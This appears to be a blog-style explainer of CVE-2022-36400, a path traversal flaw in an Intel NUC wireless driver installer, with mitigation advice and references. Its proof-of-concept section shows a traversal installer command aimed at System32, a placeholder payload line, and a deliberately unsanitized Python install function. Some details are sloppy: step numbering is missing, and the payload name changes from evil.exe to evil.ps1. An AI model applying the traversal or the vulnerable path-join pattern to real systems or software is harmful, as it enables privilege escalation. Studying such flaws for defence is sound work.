CVE-2022-36400 - Path Traversal in Intel® NUC Kit Wireless Adapter Drivers – What You Need to Know and How to Exploit It

In 2022, a vulnerability (CVE-2022-36400) was discovered in the installer software for some Intel® NUC Kit Wireless Adapter drivers for Windows 10. The issue, which affects versions before 22.40, may let a local authenticated user escalate their privileges by leveraging a path traversal bug. This article breaks down the problem step-by-step in simple language, shows how it works, includes code snippets demonstrating exploitation, and provides original references for deeper reading.

What Is Path Traversal?

Path traversal (a.k.a. directory traversal) is a security flaw allowing attackers to access files and directories outside of the intended folder. If an installer or application improperly handles file names or paths, a user might trick it into reading from or writing to sensitive locations (like C:\Windows\System32).

Vulnerability Details

CVE ID: CVE-2022-36400  
Affected Product: Intel® NUC Kit Wireless Adapter drivers for Windows 10 before version 22.40  
Attack Vector: Local, Authenticated  
Risk: Privilege Escalation  
Description:  
The installer software failed to sanitize installation paths. This allowed users to craft a malicious installer command that escapes the intended directory and drops files anywhere on the system.

Intel’s Official Advisory:  
- Intel Security Advisory INTEL-SA-00656

How Does the Attack Work?

The Intel driver installer runs with elevated privileges (administrator rights). If it accepts a crafted file path containing traversal sequences (..\), an attacker can overwrite or create files in protected directories, leading potentially to privilege escalation.

Suppose the installer runs like this

Installer.exe /installpath="C:\Program Files\Intel\WiFi"

But a user changes the path to

Installer.exe /installpath="C:\Program Files\Intel\WiFi\..\..\..\Windows\System32"

If the installer is vulnerable, it may drop files into C:\Windows\System32, a protected system folder.

Proof-of-Concept Exploit

> Disclaimer:  
> This example is to help understand the vulnerability. Do not use it on systems you do not own!

Let's assume the vulnerable installer asks for a custom folder during setup.

The path includes directory traversal

C:\Program Files\Intel\WiFi\..\..\..\Windows\System32\

Step 2: Select a Payload

An attacker can craft a malicious file (e.g., a script or executable). Let's say evil.exe.

echo Write-Host "I am running as SYSTEM!" > C:\Users\Attacker\evil.ps1

Run the installer and specify the custom (malicious) path

Installer.exe /installpath="C:\Program Files\Intel\WiFi\..\..\..\Windows\System32"

If the installer is vulnerable, it copies its files (including possibly the payload) into System32 and the attacker’s payload will land in a privileged system location.

Step 4: Gain Privileges

Depending on the payload, attacker can then "hijack" regular processes or service binaries by replacing them, gaining SYSTEM privileges or running code at elevated level.

Here's a simple Python simulation of the traversal vulnerability for educational purposes

import os

def install_file(file_name, install_path):
    # Naive install function (vulnerable)
    final_path = os.path.join(install_path, file_name)
    print("Installing to:", final_path)
    with open(final_path, "w") as f:
        f.write("Malicious content")

# Attacker input
malicious_path = r"C:\Program Files\Intel\WiFi\..\..\..\Windows\System32"
install_file("evil.bat", malicious_path)

Resulting file:
C:\Windows\System32\evil.bat

This shows how unsanitized paths can be exploited.

How to Mitigate

Intel’s Fix:  
Update to version 22.40 or newer of the driver installer. Downloads and instructions:  
- Intel Download Center

Further Reading and References

1. Intel Security Advisory INTEL-SA-00656
2. CVE-2022-36400 at NIST NVD
3. Path Traversal 101 (OWASP)
4. Mitigating Path Traversal Attacks (Acunetix)

Conclusion

CVE-2022-36400 underscores the importance of proper path validation in software installation routines, especially when running with administrative privileges. Even local, authenticated users can become attackers if software fails to block directory traversal, risking escalation to full system compromise. Always keep drivers up to date and be careful with installation paths!

If you're running affected Intel® NUC Kit Wireless Adapter drivers, update immediately to protect your system.

Timeline

Published on: 11/11/2022 16:15:00 UTC
Last modified on: 11/16/2022 16:17:00 UTC